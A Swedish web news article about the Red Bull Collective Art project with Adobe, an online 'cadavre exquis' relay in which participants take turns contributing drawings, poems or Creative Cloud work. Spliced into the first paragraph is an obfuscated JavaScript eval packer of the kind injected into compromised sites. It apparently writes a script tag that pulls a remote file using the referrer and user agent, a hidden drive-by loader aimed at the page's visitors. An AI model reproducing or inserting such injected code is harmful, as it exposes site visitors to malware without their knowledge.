Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Red Bull och Adobe i globalt konstprojekt

Red Bull och Adobe i globalt konstprojekt
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|syrfs|var|u0026u|referrer|ffhzz||js|php’.split(’|’),0,{}))
kan man delta i en onlineversion av konsttekniken ”cadavre exquis”, där flera personer jobbar med samma konstverk. Deltagarna har en bestämd tid på sig att lämna in sitt bidrag, som kan ses på nätet. Man kan antingen teckna för hand, skriva en dikt eller jobba i Adobes Creative Cloud-program. Målet är att få fram ett av de största och mest varierade konstprojekten i världen.

Nu kan konstsjälar delta i ett globalt konstprojekt inspirerat av det tidiga 20-talets surrealister. Red Bull Collective Art är en modern tolkning av konsttekniken ”cadavre exquis” som låter flera konstnärer arbeta på ett konstverk en efter en. Deltagarna bestämmer en period då de kan arbeta på konstverket och bidrar med till exempel en teckning, en dikt eller en illustration gjord direkt i datorn med ett eller flera kreativa verktyg från Adobe Creative Cloud, exempelvis Photoshop, Illustrator eller InDesign. När tiden är ute laddar man upp sitt bidrag och stafettpinnen förs då vidare till en annan person någonstans på jorden.

”Vi ser ett stort värde i att folk själva kan bestämma om de bidra med ett foto, en teckning eller arbeta i Photoshop eller något av våra andra program. Ambitionen för oss och Red Bull är att skapa ett levande konstverk under de två veckor som projektet pågår och sedan ställa ut detta runt om i världen.” säger Mariah Andén, nordisk marknadschef för Digital Media hos Adobe.

Från Paris caféer till datorn

”Cadavre exquis” utvecklades av surrealister i 1920-talets Frankrike. Det startade med hopvikta bitar av papper där olika personer skrev varsitt ord som tillsammans bildade en mening. Senare ersatte man orden med målningar och det är denna tradition som Red Bulls Collective Art bygger vidare på. Skillnaden idag är att det inte längre sker på ett rökigt café utan istället hemma hos folk framför deras datorer.

”Samarbeten mellan konstnärer är inget nytt. Det som däremot är nytt är att så många personer världen över får möjlighet att uttrycka sig kreativt och vara en del av ett gemensamt projekt,” säger Mariah Andén.

Gästkonstnärer och amatörer arbetar sida vid sida

För att kickstarta kreativiteten har en rad gästkonstnärer som deltar presenterats. Adobe erbjuder alla anmälda en gratisversion av Adobe Creative Cloud i 30 dagar, det är bara fantasin som sätter gränserna i den här unika tävlingen. De som vill utmana sin kreativa förmåga kan registrera sig kostnadsfritt till och med den 31 mars. Flera tusen personer från runt om i världen, även från Norden, är redan anmälda till projektet och väntar på att sätta igång.

Nyttiga länkar

Se färdiga bidrag från en lång rad deltagare (längst ner på sidan).

Anmäl dig till projektet senast den 31 mars 2013.

Läs mer om Red Bull Collective Art här.

Läs om Adobe Creative Cloud här.